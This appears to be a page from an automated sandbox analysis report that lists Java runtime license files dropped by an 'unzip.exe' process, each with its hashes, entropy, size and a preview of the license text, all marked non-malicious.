Preview:	## LibFFI v3.4.4..### LibFFI License.```..libffi - Copyright (c) 1996-2022 Anthony Green, Red Hat, Inc and others..See source files for details...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.``Software''), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES O

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\javafx\libxml2.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	3658
Entropy (8bit):	5.258669590384091
Encrypted:	false
SSDEEP:	96:xYfOAULu1QHToffNtqshQHTojyAiQ2jwQ:afOAU+QHTAFQHTiyAiTN
MD5:	22670C5BF7D83CC457AB5E4DC8061B5B
SHA1:	C8FC629058B052E47FF4C238B85296335D5B69CC
SHA-256:	91BADBBDFB8D52CD625C29ED726AEEEC2671897513E2A6B7F1B9A631D04AD38A
SHA-512:	A964284B22ABC2A9DA72F7D1ECA3D753C67134ED353B872FA8119BBC9517F1A5F916351DB40E3D759DE9347EE21327E73116C7A9023E9A3ACAC8EA4EA437B42D
Malicious:	false
Preview:	## xmlsoft.org: libxml2 v2.12.7..### libxml2 License.```..Except where otherwise noted in the source code (e.g. the files dict.c,.list.c, triodef.h, trionan.h, trionan.c, which are covered by a similar licence but.with different Copyright notices) all the files are:..Copyright (C) 1998-2012 Daniel Veillard. All Rights Reserved...Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies.of the Software, and to permit persons to whom the Software is furnished to do.so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMI

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\javafx\libxslt.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	6090
Entropy (8bit):	5.317068652265366
Encrypted:	false
SSDEEP:	96:Bu8QHGQr2u8QH72QrJ22j9uKktCZMrFsqQPmDoL9vZGNN:9QHNrUQH5rJB9h2Qesp43
MD5:	8DFC96522DACF3155AC0546F4796BCB8
SHA1:	7B38E703C5C9F1CF81541B2F7CD58DA7B195EAAB
SHA-256:	637F7DE93691CB2B364239E5DC9B267D439F88B4E6D81049FEBEBD209C55274F
SHA-512:	698D5E352DFABB570061D059ED882ECFCB4A4B8FB436E271B7AD8579C98F84F1E86A2BA54132B30F0EAAA5F64D5E947F64DD9BA966F911AE92F0D638107A6FF9
Malicious:	false
Preview:	## xmlsoft.org: libxslt v1.1.39..### libxslt License.```..Licence for libxslt except libexslt.----------------------------------------------------------------------. Copyright (C) 2001-2002 Daniel Veillard. All Rights Reserved...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is fur-.nished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FIT-.NESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. I

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\javafx\mesa3d.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	5732
Entropy (8bit):	5.1453426112774965
Encrypted:	false
SSDEEP:	96:tqsVQHfoGKlxESLI1GXVsCGQHlzQUGP+0nWeHGT+weUGP+0nWeHGT+wI:pQHfh4hE1GX1GQH9pqnWeHGySqnWeHGK
MD5:	C7E0D19C8F4EFF11E97F0EB9AFD3F7F4
SHA1:	6A98EE2703132E181F37D162452F073FB64CED83
SHA-256:	63F4E6F75CAEBBCCB95D903FB43E46AC7111B3624D0A34F146B276D7D9E7B152
SHA-512:	9C4111728AB9472F0B160CB11CE1E4EBD75A83CFDDCA0B3CB87243D15AFC5A7FA34DC6006E6B92084648CBAD1426F70B405259F589CDEF758442643E1618DFF4
Malicious:	false
Preview:	## Mesa 3-D Graphics Library v21.0.3..### Mesa License..```.Copyright (C) 1999-2007 Brian Paul All Rights Reserved...Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\javafx\public_suffix.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	17783
Entropy (8bit):	4.592879353119746
Encrypted:	false
SSDEEP:	384:gn7ca28R/9woeF6cXpMPWeXlUl5omyzQdBGYVSleCqxi:gn7cNw/6oj25kzQdBG4CqI
MD5:	516FBA54F66223ACB4E0E61B9C28D09A
SHA1:	AC2929C7D861BCB20E0182464C48B0375E30218B
SHA-256:	D7818E02EBFC4E5CD82613E003E7BA6BE2E9D5949EA4AA0BA88D4D2F7CA69999
SHA-512:	F99698FCAF492ACD8BFACE4CA43FDF52A8BAF65947E0FB82BAAF953998344A01FC5F752F2B3E78E9482E8A438F91136810B82CC60EA212346800944615AD3C95
Malicious:	false
Preview:	## Mozilla Public Suffix List..### Public Suffix Notice.```.You are receiving a copy of the Mozilla Public Suffix List in the following.file: <java-home>/lib/security/public_suffix_list.dat. The terms of the.Oracle license do NOT apply to this file; it is licensed under the.Mozilla Public License 2.0, separately from the Oracle programs you receive..If you do not wish to use the Public Suffix List, you may remove the.<java-home>/lib/security/public_suffix_list.dat file...The Source Code of this file is available under the.Mozilla Public License, v. 2.0 and is located at.https://raw.githubusercontent.com/publicsuffix/list/1cbd6e71a9b83620b1d0b11e49d3d9ff48c27e22/public_suffix_list.dat..If a copy of the MPL was not distributed with this file, you can obtain one.at https://mozilla.org/MPL/2.0/...Software distributed under the License is distributed on an "AS IS" basis,.WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License.for the specific language governing rights and l

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\javafx\webkit.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	331141
Entropy (8bit):	5.296469828692677
Encrypted:	false
SSDEEP:	6144:WRqN2p++SodPagDDsFZIbXFfU7gX30omhH0Q5d3n:ULp+zodPagDDsFCbXFfU7gX3chH0Q5d3
MD5:	4B88684A2CB347AD84827B7BE6777DA5
SHA1:	D24F7138697D2B1A2DDC0F3BF9B2D083FA220868
SHA-256:	B44B5932AA445CA36B0A8C9BA0B7175E6DFB91A6BEDD1D73123DF89630031958
SHA-512:	C45A921ECED29C58F8308AA6EA795A26F4EF612CD3B5A75E94B64EC49CD61C1CBD874C0E7872158682E37D9A1CACFBA0CBE5B5ADA0D33DAE4A3DFE365481D4C1
Malicious:	false
Preview:	## WebKit Open Source Project: WebKit v619.1..### WebKit Notice.```..You are receiving a copy of WebKit in either source or.object code in the JavaFX runtime or JavaFX SDK. The terms of the.Oracle license do NOT apply to WebKit; it is.licensed under the following license, separately from the Oracle programs.you receive. If you do not wish to install this library, you may delete.this library:.. - On Linux systems: delete $(JAVA_HOME)/lib/libjfxwebkit.so. - On Mac OS X systems: delete $(JAVA_HOME)/lib/libjfxwebkit.dylib. - On Windows systems: delete $(JAVA_HOME)\bin\jfxwebkit.dll..A copy of the Oracle modified WebKit library source code is located.in the following OpenJDK git repository:.. https://github.com/openjdk/jfx..You can use git to clone the repository or you can browse the.source using a web browser. The root directory of the WebKit source.code is here:.. rt/modules/javafx.web/src/main/native/.```..### LICENSE.```.There are multiple licenses that apply to different par

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\asm.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	1580
Entropy (8bit):	5.1976303403500985
Encrypted:	false
SSDEEP:	48:t5OorYJCrYJ5zO432sHj32sZEtY17wNHN:yorYJCrYJZF3X31ENt
MD5:	C82EEECA7FED16EBBE4BD8C4B2DCB476
SHA1:	303A33D78C0B836681E2DD01313084DAE2208F5C
SHA-256:	862D6CAAA90ED0D85CD0E685118EBBF6E81976DF48E62FBB81236B743EA7B8AB
SHA-512:	5EE3B0DFA02F3865FC743B083F53D8AC756BF3CAD80FAFE69AA546D82539D6B0ACB92F01A1630F9C24FC71453619DF5063F459E828447688750EDB609EDD4184
Malicious:	false
Preview:	## ASM Bytecode Manipulation Framework v5.0.3 ..### ASM License.```..Copyright (c) 2000-2011 France T.l.com.All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions.are met:..1. Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...3. Neither the name of the copyright holders nor the names of its. contributors may be used to endorse or promote products derived from. this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS".AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE.IMPLIED WARRANTIES OF MERCHANT

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\bcel.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	4.5608226065256705
Encrypted:	false
SSDEEP:	192:FNVEASdeYFPVRQUM9o1XDFMKdFSvJZN+0G04Hrc3Pv8KIHKxF9Nmu3Dzt1XkTYsr:/CxNRrM21TiA+8VL+EKdXNt9xkTYE39
MD5:	12356A0E939F990DE52169117F3A8CC0
SHA1:	B22A25F5934882C3C2DFB84BF3BDC0B63D569016
SHA-256:	F1F41CD8F691DE74A288E5669D1B6600EC609FCD9B12E8A540BD5E3B3FB9554E
SHA-512:	C32EBEAB418222053E27AEF35F66AEA3B2DFEFA4BD8F0D6C4A0046973C1CF033A63C06EEF50072E33B4A9E6B44339584F057EB4B0EE93A3CDF92CD4C3950DBAC
Malicious:	false
Preview:	## Apache Commons Byte Code usering Library (BCEL) Version 6.7.0..### Apache Commons BCEL Notice.```.. Apache Commons BCEL. Copyright 2004-2022 The Apache Software Foundation.. This product includes software developed at. The Apache Software Foundation (https://www.apache.org/)...```..### Apache 2.0 License.```.. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/..TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION..1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For t

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\cldr.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	3182
Entropy (8bit):	5.162739260656451
Encrypted:	false
SSDEEP:	48:D9n5sAzLUTluwOH+5Pik3PvhtKVtw/iNKHKsfIQB0r0qDF3BrSFD5wvN:Z5sTluwjZxP5mqFHJB+lpBrYg
MD5:	ED19B9BEB7D30C00FBA258C27DA06E5E
SHA1:	1003665D1B3B1C0AEEEC8297F6810988F242F1D1
SHA-256:	8B59040A8BA6C3711CF1E3078DF798E7D7FA85377C7A9911703DB02FE1D6525F
SHA-512:	5DC562F74A91D87C8C7366688F1AFD0F449293E9101858C683075CBF3C79B442EF893551A71C520D1EBBE2E231112BC635FF8CEBBAB40E637A32869A5DCF5CDB
Malicious:	false
Preview:	## Unicode Common Local Data Repository (CLDR) v21.0.1 ..### CLDR License..```..UNICODE, INC. LICENSE AGREEMENT - DATA FILES AND SOFTWARE..Unicode Data Files include all data files under the directories.http://www.unicode.org/Public/, http://www.unicode.org/reports/, and.http://www.unicode.org/cldr/data/. Unicode Data Files do not include PDF.online code charts under the directory http://www.unicode.org/Public/..Software includes any source code published in the Unicode Standard or under.the directories http://www.unicode.org/Public/,.http://www.unicode.org/reports/, and http://www.unicode.org/cldr/data/...NOTICE TO USER: Carefully read the following legal agreement. BY DOWNLOADING,.INSTALLING, COPYING OR OTHERWISE USING UNICODE INC.'S DATA FILES ("DATA.FILES"), AND/OR SOFTWARE ("SOFTWARE"), YOU UNEQUIVOCALLY ACCEPT, AND AGREE TO.BE BOUND BY, ALL OF THE TERMS AND CONDITIONS OF THIS AGREEMENT. IF YOU DO NOT.AGREE, DO NOT DOWNLOAD, INSTALL, COPY, DISTRIBUTE OR USE THE DATA FILES OR.SOFTW

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\colorimaging.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	162
Entropy (8bit):	4.610377797901174
Encrypted:	false
SSDEEP:	3:RFRELUacKIVVPDwwP1FZenv+PELUaRHdFFv7cOczDP8LUacKIVG9VY3:jxKIVbZAT/v9cvLKIVG8
MD5:	F1BA49FADB244E70F7D79F5121FCF56F
SHA1:	0D5706CB3C0BD0A7C036CD03E4751D132A0E4074
SHA-256:	2C102F5CA80236BE62E9A495E452D97B57F3B3353705DED10E5736A7AF940F67
SHA-512:	250A39516CA1BC418FA7A85035912481EF13E66ECBE01BED3BDC47C7BB77290CDA833A0A05401BA671A59DF0C8E58CCD2A3A08BBA632CEA745C69CFACE7CA652
Malicious:	false
Preview:	## Eastman Kodak Company: Portions of color management and imaging software..### Eastman Kodak Notice.```.Portions Copyright Eastman Kodak Company 1991-2003.```..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\cryptix.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1415
Entropy (8bit):	5.179912770731788
Encrypted:	false
SSDEEP:	24:j6omjxUno8PbOIFThJyprYFTcQLey9Rwq32stOkg9SQROd32sZyxtT41BtGW+Zq8:mhjuTOIJarYJt7Cq32srX32sZEt01BtO
MD5:	6C5C5A8FEF2914E5E09FB918B6D89EFB
SHA1:	7F9C85AC9D5A2B534D427BB6CA3F7E1C28B86E99
SHA-256:	9B21963C3F1FF7A63F2D76CEDB65271D3302646D5B1BEC2F2CC058F2F10C54DE
SHA-512:	D4E21AB2BAD8DF19ACD966E222F58BAB8C4627CB077D14366DC856FCBE70678DC79C2F0BC31DB771F91BE0A8701D3D40B8C0558660B88F73B26ADDCE40F35738
Malicious:	false
Preview:	## Cryptix AES v3.2.0..### Cryptix General License.```..Copyright (c) 1995-2005 The Cryptix Foundation Limited..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are.met:.. 1. Redistributions of source code must retain the copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in. the documentation and/or other materials provided with the. distribution...THIS SOFTWARE IS PROVIDED BY THE CRYPTIX FOUNDATION LIMITED AND.CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,.INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED..IN NO EVENT SHALL THE CRYPTIX FOUNDATION LIMITED OR CONTRIBUTORS BE.LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPE

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\dom.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	3756
Entropy (8bit):	5.036615782726521
Encrypted:	false
SSDEEP:	48:Ve/ylyTd5/pe/aR6WEebVkoFxqbvyY5rpErRz+ulK0ZSw1bQknlZFQbV:Veamn/C4FrxWfyrgulK7hkl2V
MD5:	1E47B62A498E539A4A75377EE34AE5E4
SHA1:	62EEFBF6EB42A22614ACA424298CBCF5B797051B
SHA-256:	6AFA32B134D5B9F259D397137283B3BA0678E030FC1375AA3DA32FF4FB5899BD
SHA-512:	E2F6350C2781BC35BA7B2C53361B31FF1DD2FBEA260BB4A91A68D2F2D3FA9C1983D87C70F62EFEA58FF3C369A84B39BFB74489C31A420AE08032913CB12A79B7
Malicious:	false
Preview:	## DOM Level 3 Core Specification v1.0..### W3C Software Notice.<pre>.Copyright . 2004 World Wide Web Consortium, (Massachusetts Institute of Technology,.European Research Consortium for Informatics and Mathematics, Keio University)..All Rights Reserved...The DOM bindings are published under the W3C Software Copyright Notice and License..The software license requires "Notice of any changes or modifications to the W3C.files, including the date changes were made." Consequently, modified versions of.the DOM bindings must document that they do not conform to the W3C standard; in the.case of the IDL definitions, the pragma prefix can no longer be 'w3c.org'; in the.case of the Java language binding, the package names can no longer be in the.'org.w3c' package..</pre>..### W3C License.```..W3C SOFTWARE NOTICE AND LICENSE..http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231..This work (and included software, documentation such as READMEs, or other.related items) is being provid

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\dynalink.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1497
Entropy (8bit):	5.192704122810525
Encrypted:	false
SSDEEP:	24:j9TAAUUnoU+bOInrYFTY+JynrYFTtssxBJJ9i432sEEAkuyROd32sZyxtT41BtmJ:8OYrYJKrYJmozi432sVK32sZEt01BtE7
MD5:	1D40CC2D0EEAED836A3D0B8154C3D657
SHA1:	7E5CB50C5A1DACA603061E00D38193D1C50B72AF
SHA-256:	754A50E07CF9E0129D4875BB5A2E10FC7628CC82E3816C102EE1966165F5FFC3
SHA-512:	DF00F602FF05D5A5FE71449DB703F9F851546E40AE5CE85B79821939ACA35387CF97226DCFEF75B942522E93C3762642ACB9105ACD17AB35A3CEE6E8C2752492
Malicious:	false
Preview:	## Dynalink v.5..### Dynalink License.```..Copyright (c) 2009-2013, Attila Szegedi..Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are.met:.* Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer..* Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution..* Neither the name of the copyright holder nor the names of. contributors may be used to endorse or promote products derived from. this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS.IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED.TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A.PARTICULAR PURPOSE ARE DISCLAIMED. IN

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\ecc.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	29223
Entropy (8bit):	4.641601907789342
Encrypted:	false
SSDEEP:	384:D0tE56OuAbn/0UVef6wFDVxnF+7xqsvLt+z/k8E9HinIVFkspWM9bc7ops08ZuQC:D0tE5trbernFCL1leSWmc7ksNZuQC
MD5:	E8F9964AA44A69F88930D10B6ADEB0B1
SHA1:	EF139F26EC3EE452C3FC3E7C39D99E8CD2A32F81
SHA-256:	A0ACC59CC26BA8DB60D1641DBB84F9F97200F046DC78079E89F9C50C061C980F
SHA-512:	64C5360C9E9F9B3BC2C3C49B6405EF0F541990737F6DDB6940DE276FAABC1432EC0101063E21CE749A00B6D2AE8FE6B541903B9252054B818E768F79ED92A67A
Malicious:	false
Preview:	## Mozilla Elliptic Curve Cryptography (ECC)..### Mozilla ECC Notice..```.This notice is provided with respect to Elliptic Curve Cryptography,.which is included with JRE, JDK, and OpenJDK...You are receiving a copy.of the Elliptic Curve Cryptography library in source.form with the JDK and OpenJDK source distributions, and as object code in.the JRE & JDK runtimes...In the case of the JRE & JDK runtimes, the terms of the Oracle license do.NOT apply to the Elliptic Curve Cryptography library; it is licensed under the.following license, separately from Oracle's JDK & JRE. If you do not wish to.install the Elliptic Curve Cryptography library, you may delete the.Elliptic Curve Cryptography library:. - On Solaris and Linux systems: delete $(JAVA_HOME)/lib/libsunec.so. - On Windows systems: delete $(JAVA_HOME)\bin\sunec.dll. - On Mac OSX systems: delete. For JRE: /Library/Internet\ Plug-Ins/JavaAppletPlugin.plugin/Contents/Home/lib/libsunec.dylib. For JDK: $(JAVA_HOM

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\freebxml.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2957
Entropy (8bit):	5.22027056591088
Encrypted:	false
SSDEEP:	48:Jxy8ZtU/b2OOrYJarYJTjqA1LaoMo7mrSPKAP26Ts432sBpXFAx3/E/I3tETph:JNtOHOrYJarYJTdfMDrt6j37FAx3/36D
MD5:	409FC7D453B37E23E9ABEF873A810ED8
SHA1:	0C9427F433E516E7CD2A2F292EB9D0A0A61010D3
SHA-256:	8800731AB11E49C7B4A9D18E0E21882D9949F7DCBCC4540B8024F962CFE65B11
SHA-512:	B3E2F4B3119175218577EE00001FEFED21F84E1421713DA3EB5C1D482A5092A7B28824D35208CC4ED72404B94BD5F273CC4DB660938D1E6E2F8A2DCD8ED30DED
Malicious:	false
Preview:	## freebXML Registry v3.1..### freebXML Notice.```.. . This software consists of voluntary contributions made by many. * individuals on behalf of the freebxml Software Foundation. For more. * information on the freebxml Software Foundation, please see. * "http://www.freebxml.org/".. . This product includes software developed by the Apache Software. * Foundation (http://www.apache.org/).. . $Header: /cvsroot/ebxmlrr/omar/license.txt,v 1.3 2006/04/16 19:10:35 dougb62 Exp $. ..```...### The freebXML License, Version 1.1.```.. ====================================================================. . * The freebxml License, Version 1.1. . Copyright (c) 2001 freebxml.org. All rights. * reserved.. . Redistribution and use in source and binary forms, with or without. * modification, are permitted provided that the following conditions. * are met:. . 1. Redistributions of source code must retain the above copyright. * notice, this list of conditions and the following dis

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\giflib.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1646
Entropy (8bit):	5.227109456123277
Encrypted:	false
SSDEEP:	24:j+ksrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4q/m3oqLF5bs9+6AnSIutXJu/wO8p1:CksaJHlxE35QHOs5e/m3ogF5bPSIMgq1
MD5:	AF10C48601D024B36ED02F7EF098A05A
SHA1:	AB1D54D614C3D23B8C0E92D40D21D0C24664687F
SHA-256:	6CD971730D3047EA57F6865B7BDCA2509A9876AE24D5C0ED0C4E32DEF5F9107E
SHA-512:	671C3A0AE9330D9B9AA363C38518EA1D87FBC4F85DBC3CD730C52938C0EEF2AD9620C868480232CFB9D37C44735C33FB729C97E27E5AEA26781BC30B81C43D60
Malicious:	false
Preview:	## GIFLIB v5.2.2..### GIFLIB License.```..The GIFLIB distribution is Copyright (c) 1997 Eric S. Raymond..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF C

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\icu.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	2930
Entropy (8bit):	5.2474229778556385
Encrypted:	false
SSDEEP:	48:fmQ5eKjpNhAY4FCNPcwSHW5rSr+lP1JKrzteztw/wHasTI4c/Lr0in/Prfk05:fmQlp/thP97fPQzkzqYHJc/3V/Prf55
MD5:	F06C93F6E0508FF7475234CFF59D9F0A
SHA1:	BE09FA29C875F3957947A3A93B2D5F4063FCBD82
SHA-256:	8EC7DFC03761F581C0DDE060B794BDA2C657A9DB708ABAAF05BE48E1889B4674
SHA-512:	DD27147C253252E76012CE4B0C8BD4DBC3DC5E3E31CBC068438BABE22CE7D54725474D30F2B075739F9926EC6477A9CF91962358C50700FA3AA2A703006324E1
Malicious:	false
Preview:	## International Components for Unicode (ICU4J) v60.2..### ICU4J License..```..UNICODE, INC. LICENSE AGREEMENT - DATA FILES AND SOFTWARE.Unicode Data Files include all data files under the directories.http://www.unicode.org/Public/, http://www.unicode.org/reports/,.http://www.unicode.org/cldr/data/,.http://source.icu-project.org/repos/icu/, and.http://www.unicode.org/utility/trac/browser/...Unicode Data Files do not include PDF online code charts under the.directory http://www.unicode.org/Public/...Software includes any source code published in the Unicode Standard.or under the directories.http://www.unicode.org/Public/, http://www.unicode.org/reports/,.http://www.unicode.org/cldr/data/,.http://source.icu-project.org/repos/icu/, and.http://www.unicode.org/utility/trac/browser/...NOTICE TO USER: Carefully read the following legal agreement..BY DOWNLOADING, INSTALLING, COPYING OR OTHERWISE USING UNICODE INC.'S.DATA FILES ("DATA FILES"), AND/OR SOFTWARE ("SOFTWARE"),.YOU UNEQUIVOCALLY ACC

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\legal\jdk\jcup.md

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1447
Entropy (8bit):	4.528080270649301
Encrypted:	false
SSDEEP:	24:jjlpTTCb5r9q6kqyiuZLX2DjXkIMmgmlye4ihXSZX3AVmF0RevTIRX2U8Zxa:1pTTIvteiupX2DNtgmlyF2Xi1F0Rjmdi
MD5:	C1FA2837B84DA0D9C48466B7F4ED6470
SHA1:	C13FC449A215750D85CB8BFF487DB242C2AF1CFF
SHA-256:	C987390CB38E2D418F3DDAC07BAEF75647F2A64E75B25A0B4FADAE1F39DBB333
SHA-512:	44337F20AE7F2438162CCB554F2A79441E48007F55EFAA330A55BDBBA7F7D9D2ACE2C47C4BD7CBA8ECF41EEE5E57F2063AE004D18D6CD684C8575203E42E0C8C
Malicious:	false
Preview:	## CUP Parser Generator for Java v 0.11b..### CUP Parser Generator License..```.Copyright 1996-2015 by Scott Hudson, Frank Flannery, C. Scott Ananian, Michael Petter..Permission to use, copy, modify, and distribute this software and its.documentation for any purpose and without fee is hereby granted, provided.that the above copyright notice appear in all copies and that both.the copyright notice and this permission notice and warranty disclaimer.appear in supporting documentation, and that the names of the authors or.their employers not be used in advertising or publicity pertaining to.distribution of the software without specific, written prior permission...The authors and their employers disclaim all warranties with regard to.this software, including all implied warranties of merchantability and.fitness. In no event shall the authors or their employers be liable for.any special, indirect or consequential damages or any damages whatsoever.resulting from loss of use, data or profits, w

